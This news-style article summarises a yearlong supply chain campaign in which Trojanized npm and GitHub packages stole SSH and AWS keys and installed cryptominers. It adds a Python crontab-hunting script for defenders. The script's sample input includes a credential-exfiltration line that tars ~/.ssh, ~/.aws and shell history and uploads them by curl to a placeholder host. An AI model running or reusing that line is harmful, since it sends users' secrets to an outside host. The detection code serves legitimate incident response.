Credential Theft and Cryptomining Insights from a Yearlong Supply Chain Attack

Credential Theft and Cryptomining in Supply Chain Attacks
A sophisticated supply chain campaign, active for roughly a year and still ongoing, has targeted both threat actors and security researchers. It has stolen login credentials by distributing Trojanized open-source code through GitHub repositories and npm packages.
Details of the Attack
- The campaign was documented by Checkmarx and Datadog Security Labs, whose reporting shows its extensive reach.
- Victims are infected through open-source packages that had been publicly available for a long time and that install a stealthy backdoor once run.
- Spear-phishing emails have also been sent to thousands of researchers.
Implications of Credential Theft
The attackers' aims are multifaceted: the backdoor collects SSH private keys, Amazon Web Services access keys, and shell command histories, and exfiltrates this data from infected devices every 12 hours.
- At the time of reporting, dozens of machines remained compromised.
- Attackers have accumulated 390,000 credentials, including those of WordPress users.
- Installation of cryptomining software has been detected on at least 68 machines.
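A hunting check a responder might run on suspect hosts, added here as an illustration and not code from the reports summarized above: it parses crontab entries for jobs that run on a fixed cadence of 12 hours or shorter and that reference credential stores (SSH keys, AWS credentials, shell history). The 12-hour exfiltration interval is the only indicator the page gives, so the schedule threshold is the page's, while the crontab content is a constructed sample, the path markers are an assumed list, and nothing here describes the real implant's persistence mechanism.

```python
"""Hunt crontab entries that run on a short fixed cadence and read credential stores.

Added illustration; constructed sample input, not an infected host's real crontab."""
import re
from dataclasses import dataclass
from typing import Optional

# Substrings of paths an exfiltration job would read (assumed list; extend as needed).
SENSITIVE_MARKERS = ("/.ssh", "/.aws", "_history", "/.config/gcloud", "/.docker/config.json")

# Cron shorthand schedules and their interval in hours (@reboot has no cadence).
ALIASES = {"@hourly": 1.0, "@daily": 24.0, "@midnight": 24.0, "@weekly": 168.0, "@reboot": None}


@dataclass(frozen=True)
class Finding:
    line: str
    interval_hours: float
    markers: tuple


def hour_interval(minute: str, hour: str) -> Optional[float]:
    """Interval in hours for the minute and hour fields of a 5-field cron schedule.

    Returns None for schedules that are not a plain, evenly spaced cadence.
    """
    if minute.startswith("*/") and hour == "*":          # every N minutes
        return int(minute[2:]) / 60
    if not re.fullmatch(r"\d+", minute):                  # unusual minute spec: give up
        return None
    if hour == "*":                                       # once an hour
        return 1.0
    step = re.fullmatch(r"\*/(\d+)", hour)                # every N hours
    if step:
        return float(step.group(1))
    if re.fullmatch(r"\d+(,\d+)*", hour):                 # explicit hour list, e.g. 0,12
        hours = sorted({int(h) for h in hour.split(",")})
        if len(hours) == 1:
            return 24.0
        gaps = [b - a for a, b in zip(hours, hours[1:])] + [24 - hours[-1] + hours[0]]
        return float(gaps[0]) if len(set(gaps)) == 1 else None
    return None


def parse_entry(line: str):
    """Split one crontab line into (interval_hours, command); (None, "") for non-job lines."""
    if line.startswith("@"):
        alias, _, command = line.partition(" ")
        return ALIASES.get(alias), command.strip()
    fields = line.split(None, 5)
    if len(fields) < 6:
        return None, ""                                   # variable assignment or junk
    minute, hour, _dom, _mon, _dow, command = fields
    return hour_interval(minute, hour), command


def scan_crontab(text: str, max_interval_hours: float = 12.0) -> list:
    """Flag jobs that run at least every `max_interval_hours` and touch credential paths."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        interval, command = parse_entry(line)
        markers = tuple(m for m in SENSITIVE_MARKERS if m in command)
        if markers and interval is not None and interval <= max_interval_hours:
            findings.append(Finding(line, interval, markers))
    return findings


# Constructed sample crontab: benign jobs, a frequent health check, two collectors
# on a 12-hour cadence, and a daily backup of ~/.ssh that sits above the threshold.
SAMPLE_CRONTAB = """\
# constructed sample, not a real infected host's crontab
SHELL=/bin/bash
0 3 * * * /usr/bin/certbot renew --quiet
0 */12 * * * tar czf /tmp/.x.tgz $HOME/.ssh $HOME/.aws $HOME/.bash_history && curl -s -T /tmp/.x.tgz https://example.invalid/up
*/5 * * * * /usr/local/bin/health-check
0 0,12 * * * python3 /tmp/.cache/collect.py ~/.aws/credentials
@daily cp -r ~/.ssh /mnt/backup/ssh
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"every {f.interval_hours:g}h, reads {', '.join(f.markers)}: {f.line}")
```

Feed it the output of `crontab -l` for each user plus the files under /etc/cron.d; the check does not cover systemd timers, `at` jobs, or launchd agents, so those need their own pass. A hit is a lead to inspect the command, not proof of compromise, and any key present on a host with a confirmed hit should be rotated rather than merely removed.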
Final Observations on Supply Chain Security
This ongoing campaign highlights how much trust the software supply chain places in open-source code that is installed and run without review, particularly proof-of-concept exploits and little-known packages. Because the backdoor harvests SSH keys and cloud access keys, any key that was present on a machine that ran code from this campaign should be treated as compromised and rotated; removing the package alone does not revoke what was already exfiltrated. Continuous vigilance and review of third-party code before execution remain imperative to protect sensitive data in these environments.
This article was prepared using information from open sources in accordance with the principles of Ethical Policy. The editorial team is not responsible for absolute accuracy, as it relies on data from the sources referenced.